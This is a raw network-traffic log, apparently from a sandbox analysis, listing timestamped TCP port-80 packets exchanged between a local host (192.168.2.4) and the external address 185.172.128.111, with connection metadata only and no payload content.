Apr 23, 2024 09:27:06.715645075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715645075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.715679884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.719671011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.719724894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768467903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768507957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768543005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768578053 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768616915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768652916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768688917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768703938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768703938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768704891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768704891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768704891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768704891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768740892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768779993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768788099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768788099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768815994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768826008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768851042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768867016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768888950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768891096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768925905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768940926 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.768963099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.768965960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.769004107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.769038916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.769011021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.769074917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.769081116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.769081116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.769113064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.769121885 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.769154072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.769165039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.769202948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.769207001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.769239902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.769262075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.769275904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.769279957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.769313097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.769324064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.769365072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.772320032 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.772357941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.772501945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.772502899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.820801020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.820929050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.820981026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.820987940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.820988894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821017027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821053028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821059942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821059942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821089983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821105957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821125984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821167946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821168900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821168900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821223021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821224928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821260929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821295977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821299076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821299076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821332932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821336985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821368933 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821388960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821417093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821444988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821482897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821518898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821527004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821527004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821554899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821562052 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821597099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821651936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821687937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821696997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821722984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821738005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821758986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821777105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821795940 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821806908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821831942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821845055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821876049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821899891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821934938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.821948051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.821985960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822093010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822129965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822141886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822182894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822381020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822416067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822433949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822452068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822465897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822488070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822496891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822524071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822535038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822560072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822572947 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822596073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822618961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822633028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822639942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822669029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822680950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822705030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822726965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822741032 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822751045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822777987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822782993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822813988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822833061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822856903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822885990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822921038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822935104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822957039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.822958946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.822995901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.823004007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.823043108 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.823450089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.823484898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.823498011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.823519945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.823529959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.823555946 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.823565960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.823600054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.823771000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.823807001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.823837042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.823842049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.823862076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.823878050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.823884964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.823919058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.825422049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.825481892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.873471022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.873550892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.873611927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.873648882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.873661995 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.873662949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.873662949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.873687029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.873724937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.873738050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.873738050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.873763084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.873778105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.873800039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.873817921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.873836040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.873850107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.873879910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.873999119 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874037027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874104023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874140024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874176025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874191999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874191999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874191999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874191999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874213934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874252081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874269009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874269009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874288082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874304056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874332905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874372005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874408007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874428988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874443054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874454021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874478102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874497890 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874541998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874700069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874736071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874758005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874779940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.874923944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.874974966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875021935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875057936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875070095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875094891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875111103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875130892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875134945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875168085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875180006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875219107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875237942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875274897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875287056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875325918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875343084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875380039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875392914 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875430107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875539064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875576019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875591993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875612020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875629902 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875648022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875653982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875684023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875696898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875720978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875734091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875773907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875821114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875869036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875889063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875935078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.875957966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875994921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.875999928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.876040936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.876682043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.876718998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.876740932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.876754999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.876763105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.876791000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.876806021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.876837015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.878041029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.878096104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921266079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921305895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921340942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921376944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921413898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921448946 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921463013 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921463013 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921463013 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921463966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921463966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921485901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921524048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921545029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921545029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921560049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921570063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921595097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921613932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921632051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.921641111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.921681881 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.925184011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.925265074 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975125074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975163937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975200891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975235939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975270033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975305080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975339890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975373983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975405931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975405931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975405931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975405931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975428104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975464106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975482941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975483894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975500107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975507975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975536108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975554943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975572109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975589037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975610971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975629091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975647926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975672960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975684881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975698948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975719929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975739956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975755930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975781918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975792885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975806952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975831985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975855112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975867987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975894928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975903988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975923061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975939989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975958109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.975976944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.975996017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.976026058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.978046894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.978188992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.989214897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.989335060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.026977062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.027044058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.027093887 CEST	80	49730	185.172.128.111	192.168.2.4
